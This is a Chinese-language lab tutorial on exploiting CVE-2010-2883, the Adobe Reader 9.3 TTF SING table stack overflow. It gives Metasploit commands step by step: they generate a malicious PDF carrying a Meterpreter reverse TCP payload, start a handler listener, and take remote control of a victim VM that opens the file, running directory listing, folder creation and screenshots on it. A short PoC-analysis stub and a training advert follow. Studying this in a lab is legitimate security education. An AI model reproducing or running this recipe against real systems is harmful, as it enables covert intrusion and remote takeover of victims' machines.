Adobe Reader TTF字体SING表栈溢出漏洞

CVE-2010-2883漏洞利用（Kali虚拟机）

    1. 打开Kali系统，输入指令msfconsole

    2. 指令 search cve-2010-2883 

    3.获取主机ip

       打开命令行窗口 指令 ifconfig

    4. 指令 use exploit/windows/fileformat/adobe_cooltype_sing

        （使用此漏洞模块）

        指令 set payload windows/meterpreter/reverse_tcp

        （调用meterpreter载荷，反向连接到渗透机）

        指令 set lhost 192.168.117.134

        （设置主机ip）

        指令 set FILENAME CVE-2010-2883.pdf

        （设置漏洞利用文件名）

        指令 show options

        （查看选项）

        指令 exploit

        （生成漏洞利用文件）

    5. Metasploit开启shell监听会话，等待肉鸡上线

        指令 use exploit/multi/handler

        (使用handler监听模块)

        指令 set payload windows/meterpreter/reverse_tcp

        (回弹一个tcp连接)

        指令 set lhost 192.168.117.134

        (设置监听ip地址)

        指令 show options

        (查看设置选项)

        exploit

        (开启监听，等待回连)

    6. 在目标靶机内装载AdobeReader 9.3

    7. 将生成的CVE-2010-2883.pdf（漏洞利用文件）拷贝至目标靶机，使用Adobe Reader打开此文件

    8. 靶机出现卡顿的情况（此时靶机正在与主机进行连接）

    9. 回到主机，发现此时已经成功与靶机进行了连接

    10. 指令 dir （查看靶机目录文件）

         指令 mkdir aaa （在靶机当前目录下创建文件夹）

         指令 screenshot （靶机截图）

POC样本解析

网上下裁PDFStreamDumper解析PDF工具

使用PDFStreamDumper打开Poc样本（注：此poc样本为漏洞战争附属资料——名企面试自助手册）

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课